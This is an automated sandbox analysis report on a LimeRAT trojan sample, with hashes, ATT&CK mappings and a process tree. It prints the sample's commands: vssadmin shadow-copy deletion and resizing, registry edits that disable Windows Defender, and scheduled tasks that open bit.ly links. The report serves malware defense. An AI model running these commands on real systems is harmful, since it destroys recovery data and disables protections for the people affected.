limerat | d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845

Analysis

max time kernel
64s
max time network
67s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2022 18:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Size

330KB
MD5

72efeddca26a5d0a789631998394a2bb
SHA1

8d0490107f947cd1e78c89905eede3312bc402ee
SHA256

d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845
SHA512

344549d18f9fe37b0be7bb5610104ed1551f1e2746ce98ed4f990db52f9c9743102861e25865f6dcb0aed392899cdc4679ed29cf9a4c85e3c76737dac61af6d2
SSDEEP

3072:yI/0W1y4RbVFufrbjKYOPwAEoznq1vK7rbKO6oqoO0MCSgZNz:yRky4R0bDDknq1cm70QiN

Score

10^/10

limerat evasion ransomware rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/2796-132-0x0000019979490000-0x00000199794E8000-memory.dmp	disable_win_def
behavioral2/files/0x000400000001d9ef-170.dat	disable_win_def
behavioral2/files/0x000400000001d9ef-171.dat	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

Processes:

TRACERT.exe

pid	Process
4120	TRACERT.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exeTRACERT.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	TRACERT.exe

Enumerates connected drives 3 TTPs 17 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	Process
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
5080	4120	WerFault.exe	141

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
764	schtasks.exe
4660	schtasks.exe
3340	schtasks.exe
3604	schtasks.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disabling Security Tools
T1089

Modify Registry
T1112

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
1768	vssadmin.exe
4828	vssadmin.exe
2840	vssadmin.exe
2060	vssadmin.exe
744	vssadmin.exe
1252	vssadmin.exe
2632	vssadmin.exe
3004	vssadmin.exe
3856	vssadmin.exe
3436	vssadmin.exe
3964	vssadmin.exe
1604	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

Processes:

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exepowershell.exeTRACERT.exe

pid	Process
2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
5004	powershell.exe
5004	powershell.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe
4120	TRACERT.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exepowershell.exevssvc.exeTRACERT.exe

description	pid	Process
Token: SeDebugPrivilege	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeBackupPrivilege	4688	vssvc.exe
Token: SeRestorePrivilege	4688	vssvc.exe
Token: SeAuditPrivilege	4688	vssvc.exe
Token: SeBackupPrivilege	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeSecurityPrivilege	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeBackupPrivilege	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeDebugPrivilege	4120	TRACERT.exe
Token: SeDebugPrivilege	4120	TRACERT.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2796 wrote to memory of 764	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	86
PID 2796 wrote to memory of 764	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	86
PID 2796 wrote to memory of 5004	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	91
PID 2796 wrote to memory of 5004	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	91
PID 2796 wrote to memory of 3740	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	96
PID 2796 wrote to memory of 3740	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	96
PID 2796 wrote to memory of 3588	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	95
PID 2796 wrote to memory of 3588	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	95
PID 2796 wrote to memory of 1072	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	93
PID 2796 wrote to memory of 1072	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	93
PID 2796 wrote to memory of 2248	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	97
PID 2796 wrote to memory of 2248	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	97
PID 2796 wrote to memory of 4584	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	102
PID 2796 wrote to memory of 4584	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	102
PID 2796 wrote to memory of 1112	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	100
PID 2796 wrote to memory of 1112	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	100
PID 2796 wrote to memory of 1564	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	104
PID 2796 wrote to memory of 1564	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	104
PID 2796 wrote to memory of 4520	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	105
PID 2796 wrote to memory of 4520	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	105
PID 2796 wrote to memory of 2660	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	106
PID 2796 wrote to memory of 2660	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	106
PID 2796 wrote to memory of 3680	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	110
PID 2796 wrote to memory of 3680	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	110
PID 2796 wrote to memory of 1076	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	112
PID 2796 wrote to memory of 1076	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	112
PID 2796 wrote to memory of 436	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	114
PID 2796 wrote to memory of 436	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	114
PID 2796 wrote to memory of 4156	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	117
PID 2796 wrote to memory of 4156	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	117
PID 3588 wrote to memory of 3548	3588	cmd.exe	123
PID 3588 wrote to memory of 3548	3588	cmd.exe	123
PID 2248 wrote to memory of 2840	2248	cmd.exe	121
PID 2248 wrote to memory of 2840	2248	cmd.exe	121
PID 1072 wrote to memory of 3004	1072	cmd.exe	119
PID 1072 wrote to memory of 3004	1072	cmd.exe	119
PID 3740 wrote to memory of 4828	3740	cmd.exe	120
PID 3740 wrote to memory of 4828	3740	cmd.exe	120
PID 4584 wrote to memory of 3856	4584	cmd.exe	122
PID 4584 wrote to memory of 3856	4584	cmd.exe	122
PID 2660 wrote to memory of 744	2660	cmd.exe	125
PID 2660 wrote to memory of 744	2660	cmd.exe	125
PID 1564 wrote to memory of 2060	1564	cmd.exe	124
PID 1564 wrote to memory of 2060	1564	cmd.exe	124
PID 4520 wrote to memory of 3436	4520	cmd.exe	126
PID 4520 wrote to memory of 3436	4520	cmd.exe	126
PID 3680 wrote to memory of 3964	3680	cmd.exe	127
PID 3680 wrote to memory of 3964	3680	cmd.exe	127
PID 1112 wrote to memory of 1604	1112	cmd.exe	129
PID 1112 wrote to memory of 1604	1112	cmd.exe	129
PID 4156 wrote to memory of 1252	4156	cmd.exe	128
PID 4156 wrote to memory of 1252	4156	cmd.exe	128
PID 436 wrote to memory of 2632	436	cmd.exe	131
PID 436 wrote to memory of 2632	436	cmd.exe	131
PID 1076 wrote to memory of 1768	1076	cmd.exe	132
PID 1076 wrote to memory of 1768	1076	cmd.exe	132
PID 2796 wrote to memory of 2124	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	135
PID 2796 wrote to memory of 2124	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	135
PID 2796 wrote to memory of 5036	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	138
PID 2796 wrote to memory of 5036	2796	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	138
PID 2124 wrote to memory of 4660	2124	cmd.exe	139
PID 2124 wrote to memory of 4660	2124	cmd.exe	139
PID 5036 wrote to memory of 3340	5036	cmd.exe	140
PID 5036 wrote to memory of 3340	5036	cmd.exe	140

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
  2⤵
  - Creates scheduled task(s)
  PID:764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3004
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3588
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:3548
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3740
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4828
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2840
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1604
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3856
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2060
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3436
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:744
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3680
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3964
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1076
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1768
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2632
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4156
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1252
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C schtasks /create /f /st "14:47" /sc weekly /mo "30" /d "Thu" /tn "NvTmRep_CrashReport{AIOTLNXH}" /tr "'explorer'http://bit.ly/2X64qZo"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "14:47" /sc weekly /mo "30" /d "Thu" /tn "NvTmRep_CrashReport{AIOTLNXH}" /tr "'explorer'http://bit.ly/2X64qZo"
    3⤵
    - Creates scheduled task(s)
    PID:4660
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C schtasks /create /f /st "10:37" /sc monthly /m "aug" /tn "GoogleUpdateTaskMachineCore{AIOTLNXH}" /tr "'explorer'https://bit.ly/3nV5bAA"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5036
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "10:37" /sc monthly /m "aug" /tn "GoogleUpdateTaskMachineCore{AIOTLNXH}" /tr "'explorer'https://bit.ly/3nV5bAA"
    3⤵
    - Creates scheduled task(s)
    PID:3340
- C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe
  "C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:3604
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4120 -s 1888
    3⤵
    - Program crash
    PID:5080

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4120 -ip 4120
1⤵
PID:2060

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

File Deletion

Modify Registry

Web Service

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

Filesize
330KB

MD5
72efeddca26a5d0a789631998394a2bb

SHA1
8d0490107f947cd1e78c89905eede3312bc402ee

SHA256
d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845

SHA512
344549d18f9fe37b0be7bb5610104ed1551f1e2746ce98ed4f990db52f9c9743102861e25865f6dcb0aed392899cdc4679ed29cf9a4c85e3c76737dac61af6d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

Filesize
330KB

MD5
72efeddca26a5d0a789631998394a2bb

SHA1
8d0490107f947cd1e78c89905eede3312bc402ee

SHA256
d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845

SHA512
344549d18f9fe37b0be7bb5610104ed1551f1e2746ce98ed4f990db52f9c9743102861e25865f6dcb0aed392899cdc4679ed29cf9a4c85e3c76737dac61af6d2

Download Submit
C:\Users\Admin\AppData\Roaming\LinkM\TRACERT.exe.lnk

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/436-150-0x0000000000000000-mapping.dmp

Download
memory/744-157-0x0000000000000000-mapping.dmp

Download
memory/764-134-0x0000000000000000-mapping.dmp

Download
memory/1072-141-0x0000000000000000-mapping.dmp

Download
memory/1076-149-0x0000000000000000-mapping.dmp

Download
memory/1112-144-0x0000000000000000-mapping.dmp

Download
memory/1252-162-0x0000000000000000-mapping.dmp

Download
memory/1564-145-0x0000000000000000-mapping.dmp

Download
memory/1604-161-0x0000000000000000-mapping.dmp

Download
memory/1768-164-0x0000000000000000-mapping.dmp

Download
memory/2060-158-0x0000000000000000-mapping.dmp

Download
memory/2124-165-0x0000000000000000-mapping.dmp

Download
memory/2248-142-0x0000000000000000-mapping.dmp

Download
memory/2632-163-0x0000000000000000-mapping.dmp

Download
memory/2660-147-0x0000000000000000-mapping.dmp

Download
memory/2796-132-0x0000019979490000-0x00000199794E8000-memory.dmp

Filesize
352KB

Download
memory/2796-133-0x00007FFAA2C90000-0x00007FFAA3751000-memory.dmp

Filesize
10.8MB

Download
memory/2796-172-0x00007FFAA2C90000-0x00007FFAA3751000-memory.dmp

Filesize
10.8MB

Download
memory/2796-135-0x00007FFAA2C90000-0x00007FFAA3751000-memory.dmp

Filesize
10.8MB

Download
memory/2840-153-0x0000000000000000-mapping.dmp

Download
memory/3004-154-0x0000000000000000-mapping.dmp

Download
memory/3340-168-0x0000000000000000-mapping.dmp

Download
memory/3436-159-0x0000000000000000-mapping.dmp

Download
memory/3548-152-0x0000000000000000-mapping.dmp

Download
memory/3588-140-0x0000000000000000-mapping.dmp

Download
memory/3604-174-0x0000000000000000-mapping.dmp

Download
memory/3680-148-0x0000000000000000-mapping.dmp

Download
memory/3740-139-0x0000000000000000-mapping.dmp

Download
memory/3856-156-0x0000000000000000-mapping.dmp

Download
memory/3964-160-0x0000000000000000-mapping.dmp

Download
memory/4120-183-0x0000023A5B79B000-0x0000023A5B79E000-memory.dmp

Filesize
12KB

Download
memory/4120-177-0x0000023A5B04A000-0x0000023A5B04F000-memory.dmp

Filesize
20KB

Download
memory/4120-179-0x0000023A5B794000-0x0000023A5B797000-memory.dmp

Filesize
12KB

Download
memory/4120-180-0x0000023A5B797000-0x0000023A5B79C000-memory.dmp

Filesize
20KB

Download
